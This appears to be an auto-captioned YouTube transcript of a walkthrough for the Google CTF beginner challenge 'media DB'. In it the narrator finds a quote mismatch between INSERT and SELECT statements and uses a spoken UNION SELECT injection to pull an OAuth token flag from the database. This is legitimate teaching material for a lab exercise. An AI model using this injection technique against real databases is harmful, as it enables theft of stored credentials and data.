 Hey everyone, welcome back to the YouTube video still looking at the Google capture the flag competition that just finished up a little bit of go on the last weekend Shout out to live overflow who was willing to take a look at this game with me and hopefully he'll be releasing some cool stuff Very very soon to cover some of the challenges that he took a look at and I kind of took a look at with him But he was a real rockstar on so check out his YouTube channel if you haven't already, but let's jump in This next challenge I want to cover and the beginner's quest is another miscellaneous challenge at the top path That's called media DB It's a miscellaneous challenge as I've already said looks like there's a custom database stuff You can read out the kind of the prompt, but it has a netcat connection And it also has an attachment so we might be getting a binary getting a script or program We can actually take a look at here. So Let's create a directory for this stuff And work with it media DB Let's create a connect script So I can netcat into that real easily Mark that to connect And let's download this attachment gctf media db cool It's pretty easy to tell that this is another zip archive. Yep as expected Um media dot zip or whatever call it whatever we want. Let's unzip that and we have media db Oh, it's a python script. Okay, cool. Let's see that in Sublime Bang here we go Python 2.7 you can tell from this your bang line Importing sequel light. Okay. So we got a database here um that banner Uh, that looks like it allows us to add a song play the artist place long etc etc Let's let's interact with the program for one thing. Let's actually do this connect thing Uh, I guess I don't know why I did that because now I actually do want to know what these functions do Let's let's read the source code Um Opening oa token as file descriptor flag equals. Okay. So flag is the contents of this oa token file and Okay, the connection the database is running in memory needs whatever Um, okay, and the oa tokens is what has the flag So that table oa tokens has the flag for us and we have media Which actually has artists and song And we have function that will print stuff out for us. We'll have the Functions to print out a playlist. Okay, it prints out the banner It sends that along And then there's a big loop that gets the banner for us gets the menu anyway Um reads in our input and then determines what we've entered the choice So, okay, so if it's anything in that menu, if not, it will obviously tell us no Like six Okay, eights blah blah blah that will determine if we have the correct input and if one If we're asking for artist name reads in a song name and it runs a sequel statement here insert into media with double quotes And it's using a format. So python format is Not as bad as concatenating, but it is still putting that putting our our arguments in their raw So but that's wrapped in double quotes here That is inserting into the database though That's good to note other artists to what is that option? so add a song And play from an artist insert into Select these things Select uses single quotes here. Okay, that's peculiar select from Song uses single quotes number four Select artist song from media where artist is this single quotes Huh, and that's all okay. Otherwise is bye. So that's peculiar because we're inserting where we have double quotes as our barrier But we're selecting where we having single quotes as our barrier. So We could mess around with that because We could we could just use a double quotes or single quotes to Like break out of that, but it looks like they're doing a good job to replace those characters like These lines here artists replace or song replace, etc, etc um Hmm But because of that discrepancy where we have double quotes on one side and single quotes on the other we can Insert into the database with single quotes breaking and We can have sequel injection just like that. Let's uh Let's try. Let's let's give that a go Um, let's kill sublime text now that we have an idea and attack factor. Um, let's connect and add a song artist name john wins right just for Just to see the proof of concept. Okay. Yeah, we can add steps to the database. So let's add artist name john And then Oh artist is where they're actually if I if I were to shuffle songs artists is what they're actually querying for So song name can be subscribe. How about that? Whatever? For wins, etc, etc add song. Let's do john um Single quote union select one two Because what are they what were they selecting? Song and artists, right? So let's have a comment there And anything for song name now if I were to run this Oh, looks like we get two by one Looks like our union union select worked So we can and now that we know that that works for us Let's try and add a song where we can do john single quote union select Select o-auth token from o-auth tokens and then two Comment comment because o-auth token had the flag in that table o-auth tokens is where that was stored So song name can be lol subscribe again Because sequel injection super cool Um, let's shuffle the artist and just like that we get our flag. So neat Let's steal that I think is a pretty interesting catch checking out the quotes that it's using Um, and we can get around that since we that was the discrepancy between double quote and a single quote Um, if you wanted to you could write a get flag script for this I'm not going to go through that process, but we Since we're connecting with the service. I would use pwn tools Send it that exploit quote on quote or send it that technique or that bug take advantage of that vulnerability and I don't know print out just your flag sweet Let's uh mark this as complete And we're done with the meaty db challenge. Thank you guys for watching. Hope you're enjoying these videos Uh, check out live overflow if you haven't already. Hopefully we can do more content together again soon Uh, at least be still interacting still talking because he's an awesome youtuber And uh, I'm really happy to be getting getting together with him Hey, if you'd like this video, please press that like button Uh, if you'd like to maybe leave me a comment Let me know what you think what else you'd like to see what I can do better with please do If you're willing to subscribe and I'm grateful for it. So see you soon